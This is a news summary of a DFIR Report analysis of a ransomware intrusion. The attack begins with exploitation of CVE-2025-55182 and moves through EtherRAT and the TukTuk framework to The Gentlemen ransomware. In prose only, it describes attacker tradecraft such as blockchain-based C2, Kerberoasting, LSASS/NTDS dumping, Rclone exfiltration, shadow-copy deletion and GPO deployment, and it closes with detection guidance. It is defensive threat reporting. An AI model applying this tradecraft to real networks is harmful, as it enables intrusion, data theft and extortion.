EtherRAT to TukTuk to The Gentlemen: Full Attack Chain Detailed in New DFIR Report
The DFIR Report dissects an intrusion where attackers exploited CVE-2025-55182 to deploy EtherRAT, evolved to the TukTuk framework, and ultimately deployed The Gentlemen ransomware.
The DFIR Report has published a detailed analysis of a sophisticated intrusion that began with exploitation of CVE-2025-55182 (React2Shell) on Linux servers and culminated in domain-wide deployment of The Gentlemen ransomware. The attack chain, active from December 2025 through April 2026, showcases a multi-stage evolution of malware families and a heavy reliance on blockchain and SaaS infrastructure for command-and-control (C2) resilience.
Initial access was achieved via CVE-2025-55182, a vulnerability in React-based web applications. The attackers deployed EtherRAT, a malware family first reported by Sysdig in December 2025. In this intrusion, EtherRAT was delivered through a malicious MSI installer masquerading as the Sysinternals RAMMap utility. The malware used the Ethereum blockchain via EtherHiding to dynamically update its C2 configuration, contacting 1rpc[.]io to retrieve configuration data hosted on the blockchain. At first, no active C2 was available, but the threat actor later updated the Ethereum-hosted config to point to a TryCloudflare tunnel, enabling active communications.
After establishing C2, the attackers conducted extensive reconnaissance, including system profiling, antivirus enumeration, domain checks, and LDAP-based user activity discovery. They then downloaded additional payloads from S3 buckets, deploying the TukTuk malware framework disguised as legitimate software binaries such as Greenshot, SyncTrayzor, DocFX, and Cake build automation system. TukTuk established primary C2 channels through SaaS platforms ClickHouse and Supabase, with backup channels capable of leveraging Ably, Dropbox, direct HTTP, or GitHub Issues. The framework also included a dead-drop resolver using the Arweave blockchain to retrieve encrypted configuration blobs containing credential pools for all supported C2 transports.
With TukTuk in place, the threat actor began hands-on-keyboard activity, performing Kerberoasting, credential discovery targeting administrative accounts, and lateral movement using compromised service account credentials. They deployed the GoTo Resolve remote management tool across multiple systems, including servers and domain controllers. Over subsequent days, they expanded access through RDP, SMB, WinRM, NetExec, Mimikatz, and LSASS/NTDS dumping, while resetting privileged account passwords and conducting broad Active Directory reconnaissance.
Data exfiltration was carried out using Rclone to transfer large volumes of sensitive data to Wasabi cloud storage. Three days into the intrusion, ransomware operations began with the deployment of The Gentlemen ransomware on key servers. Prior to encryption, the attackers disabled Microsoft Defender protections, added AV exclusions, stopped virtual machines, deleted shadow copies, cleared event logs, and removed forensic artifacts. The intrusion ended with domain-wide ransomware deployment through a malicious Group Policy Object (GPO) that executed staged ransomware binaries within SYSVOL/NETLOGON via scheduled tasks across the environment.
The DFIR Report provides extensive detection engineering guidance, including monitoring for msiexec.exe executing from user directories and spawning unexpected children, hunting for curl downloads from the internet, and monitoring for unusual registry Run keys. The report also highlights the threat actor's use of multiple SaaS platforms and blockchain infrastructure, making their campaign resilient to traditional network defenses. This intrusion underscores the evolving sophistication of ransomware operations, combining initial exploitation, multi-stage malware deployment, and extensive use of legitimate services for C2 and data exfiltration.
Trend Micro Research provides a detailed technical analysis of CVE-2025-55182, a CVSS 10.0 pre-authentication RCE in React Server Components, and reports that the vulnerability is being exploited in the wild in campaigns such as emerald and nuts, delivering Cobalt Strike, Nezha, FRP, Sliver, and Secret-Hunter payloads. The analysis also notes nearly 145 in-the-wild PoCs of varying quality, including WAF bypasses and mass-scanning tools, and clarifies misconceptions to help organizations deploy effective defenses.